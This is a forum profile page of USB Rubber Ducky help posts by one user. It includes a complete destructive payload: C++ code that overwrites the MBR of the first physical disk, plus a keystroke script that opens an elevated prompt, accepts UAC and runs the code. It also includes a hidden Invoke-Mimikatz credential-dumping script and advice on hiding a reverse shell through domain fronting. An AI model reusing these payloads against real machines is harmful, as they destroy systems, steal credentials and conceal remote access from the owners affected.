-
Posts
66 -
Joined
-
Last visited
-
Days Won
1
Posts posted by ThoughtfulDev
-
-
be quiet! Silent Base 800 Black, No Window ASUS Prime X370-Pro AMD Ryzen 7 1700X 2x8GB Vengeance DDR4-3200 be quiet! Silent Loop 120mm MSI GTX 770 Samsung 850 Evo 250GB SSD 550 Watt Corsair Semi Modular PSU (dont know the actual name rn)
Wanted to buy a new GPU for Machine Learning but prices are so damn high...
- 1
-
Did you changed the Keyboard layout to "es" when compiling the duckyscript?
-
Reminds me of my PyDuckGen.
But seems like your script works ;) (I have a look if i can improve your script)
-
I guess that this is not possible since no driver is loaded and/or can be installed if you arent on win/linux/osx
-
-
On 20.10.2017 at 2:23 PM, denisit said:
STRING ="K0cj0mKMchAAAAAAAAAAC0MHOM6B-qtOB9zszza03NGx21eRsaKiurS"this is wrong no quotes and = are needed to it should look like this:
STRING K0cj0mKMchAAAAAAAAAAC0MHOM6B-qtOB9zszza03NGx21eRsaKiurS
-
13 hours ago, Dave-ee Jones said:
You could generate a random number and do a switch of some kind?
if __NUMBER__ is 1: Q STRING "IT'S 1!" else if __NUMBER__ is 2: Q STRING "Oh boi. It's 2." ...
Down further in that page it actually gives an example of throwing a dice.
that would be possible if he were using a BashBunny haha :) since the ducky is only a HID this wont work directly on the ducky.
-
As far as i know the ducky cant do that on it self. maybe you can write a bash/batch script to copy a random key/number into your clipboard and start that and the ducky just presses CTRL+V to copy that random character?
-
1 hour ago, i8igmac said:
I was thinking a chromebook with intel chip. I don't see any one talking about them here.
my wife has one with a intel chip. I have been itching to fire up linux. I have read its hardware works out of the box.
They are cheap.
The toucch sccreen might perform well with gnome shell3 and will give it a greate tablet style user interface...
Long battery life.
The intel ones do work with e.g Gallium OS(which is ubuntu + the necessary chromebook drivers). (use it myself)
-
I dont get your problem? Session 1 was opened...so just use sessions to list your sessions and interact with them.
This is basic metasploit stuff... maybe you should have a look at metasploit minute.
-
Credits: https://github.com/brainsmoke/nyanmbr (he wrote a freaking bootloader with nyancat.. AMAZING)
I made a payload to overwrite your bootloader with the nyancat bootloader which will render your PC USELESS.
CAUTION: This will brick your bootloader. DO NOT TRY THIS on your OWN PC USE A VM
1. Download the precompiled boot.exe (source code is here if you want to compile yourself):
#include <windows.h> #include <conio.h> #include <iostream> int main(int argc, char* argv[]){ DWORD dw; char *pathToBin = "boot.bin"; HANDLE drive = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0); if (drive != INVALID_HANDLE_VALUE){ HANDLE binary = CreateFile(pathToBin, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0); if (binary != INVALID_HANDLE_VALUE){ DWORD size = GetFileSize(binary, 0); if (size > 0){ byte *mbr = new byte[size]; if (ReadFile(binary, mbr, size, &dw, 0)){ std::cout << "Binary file successfuly read!" << std::endl; if (WriteFile(drive, mbr, size, &dw, 0)){ std::cout << "First sector overritten successfuly!" << std::endl; } else std::cerr << "Fatal error! Can't override 1st sector!" << std::endl; } else std::cerr << "Error reading from binary file!" << std::endl; } else std::cerr << "Invalid binary file!" << std::endl; } else{ std::cerr << "Can't find the binary file to read from!" << std::endl; } CloseHandle(binary); } else std::cerr << "Administrator privileges required!" << std::endl; CloseHandle(drive); return 0; }
2. Create Folder exec on your ducky sdcard and copy boot.exe into it.
3. Download the img file from https://github.com/brainsmoke/nyanmbr and rename it to boot.bin and put it in DUCKY\exec\boot.bin
4. Here is the duckyscript( make sure your sdcard is labeld: DUCKY):
REM I am NOT responsible for ANY DAMAGE REM overwrites bootloader with https://github.com/brainsmoke/nyanmbr DELAY 5000 ESCAPE DELAY 500 CONTROL ESCAPE DELAY 500 STRING cmd DELAY 500 CTRL-SHIFT ENTER DELAY 1000 REM replace with desired uac alt + key kombo (y for yes in english , j for german etc) ALT y DELAY 1500 STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do %a ENTER DELAY 300 STRING cd exec ENTER DELAY 300 STRING boot.exe ENTER DELAY 1000 STRING exit ENTER
I have also added this payload to my PyDuckGen (https://github.com/ThoughtfulDev/PyDuckGen) which makes generating payloads easier
-
Nope no solution except what you already said: Delay
-
2 hours ago, JeepartN said:
it works now with the new sd card however in my script i want to use a powershell command that has a - in it. But when it puts in the command i get a + instead
try encoding in your keyboard layout (default is US)
-
You can run powershell and cmd without admin privs or am i mistaken?
e.g ctrl +r and then powershell/cmd.exe will run the it without admin privs.
-
I'm using PIA but have a look at That One Privacy Site. That dude is just awesome!
- 1
-
Are you sure that php is enabled in your apache or IIS webserver?
try to place a php file e.g test.php in the webdirectory root with the following content:
<?php phpinfo(); ?>
if you now visit yourwebserver/test.php you should see a table with some information if php is enabled.
I use this to run mimikatz from sdcard/exec/mimikatz.ps1 and save the content to sdcard/data/mimikatz
REM ------------------------------------------------------------------------------------- REM Get drive letter of drive with label DUCKY REM ------------------------------------------------------------------------------------- STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d ENTER DELAY 500 REM ------------------------------------------------------------------------------------- REM Copy and execute Invoke Mimikatz REM ------------------------------------------------------------------------------------- STRING if exist %duck%\exec\mimikatz.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\exec\mimikatz.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\data\mimikatz\%computername%_creds.txt';"
Make sure that sdcard/exec/mimikatz.ps1 and the folder sdcard/data/mimikatz exist.
-
The c_duck_v2.1.hex is the standart TwinDuck Firmware which mounts your Ducky as a HID Keyboard and USB Storage Device. The payload starts as soon as you plug it in. This is probably want you want to use.
-
Flash the TwinDuck Firmware, which allows the ducky to be seen as a USB Storage Device and a HID Keyboard.
The call your SDCard 'DUCKY' and use this script:
for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d
%duck& stores the drive letter of your ducky :)
-
Use something like:
Invoke-Mimikatz -DumpCreds|Out-File '%tmp%\%computername%_creds.txt';
this writes the output of Invoke-Mimikatz to your temp folder in a file name yourpcname_creds.txt which you can then read and or even send as a email attachment if you want.
ps: the invoke mimikatz script isn't hosted on darrens webserver - use your own host.
-
As far as i know it should show any output since it only writes a file in the current folder (e.g /var/www/html or sth).
-
It should work as long as there are corresponding hotkeys to do the things you want :)
-
10 hours ago, Willhall996 said:
Can anyone tell me what other files, if any, are on the memory card with the inject.bin file. lost the original card and also if it has to be formatted in any specific manor?
FAT32. and no only the inject.bin since this was just the hello world payload. as already said use the java encoder to encode your raw txt payload into the inject.bin
-
I use this one to find a drive labeled ducky(works in win 10/8/7)
for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d
%duck% contains your ducky drive letter.
-
On 9.6.2017 at 5:38 PM, ItsKorma (YT) said:
I need help im new to this, i just got usb rubber ducky. its bit hard for me to get around it at the moment, but what you just said is what im looking for i want to be able to view victim screen or control it, able to look at the files etc. Please help me step by step.
Sounds like you need a Basic Metasploit payload (dont worry about the stealth /undetected part for now). Have a look at Metasploit Minute for Tutorials about Metasploit.
Anonymous reverse shell
in Questions
Posted
How about using Domain Fronting?
You can connect your C&C Server to a VPN with port forwarding and then let the shell connec to that port on the vpn side which will then be forwarded to your C&C... in theory.